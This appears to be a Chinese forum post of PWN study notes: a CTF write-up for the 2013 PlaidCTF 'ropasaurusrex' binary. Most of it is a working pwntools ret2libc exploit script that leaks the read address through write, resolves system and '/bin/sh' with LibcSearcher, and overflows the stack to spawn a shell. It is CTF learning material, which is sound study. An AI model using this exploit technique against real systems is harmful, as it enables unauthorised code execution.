-
-
[原创]PWN学习笔记【基本ROP练习】【2013-PlaidCTF-ropasaurusrex】
-
发表于: 2022-5-27 16:23 7818
-
#!/usr/local/bin/python3 from pwn import * from LibcSearcher import LibcSearcher sh = gdb.debug('./ropasaurusrex-85a84f36f81e11f720b1cf5ea0d1fb0d5a603c0d', "b *0x804841D") elf = ELF('./ropasaurusrex-85a84f36f81e11f720b1cf5ea0d1fb0d5a603c0d') write_plt = elf.plt['write'] read_got = elf.got['read'] sub_80483F4 = 0x80483F4 payload = flat([ 'A' * 136, 0xdeadbeef, write_plt, sub_80483F4, 1, read_got, 4, 'B'*96 ]) sh.send(payload) print ("get the read addr") libc_read_addr = u32(sh.recv()[0:4]) libc = LibcSearcher('read', libc_read_addr) libcbase = libc_read_addr - libc.dump('read') system_addr = libcbase + libc.dump('system') binsh_addr = libcbase + libc.dump('str_bin_sh') print ("get shell") payload = flat([ 'C' * 136, 0xdeadbeef, system_addr, 0xdeadbeef, binsh_addr, 'D'*104 ]) sh.send(payload) sh.interactive()
通过write(1,got['read'],4)泄露read函数地址
LibcSearcher 查找libc版本,并计算system和str_bin_sh地址
重复调用sub_80483F4函数,溢出返回到system("/bin/sh")
赞赏
他的文章
看原图
赞赏
雪币:
留言: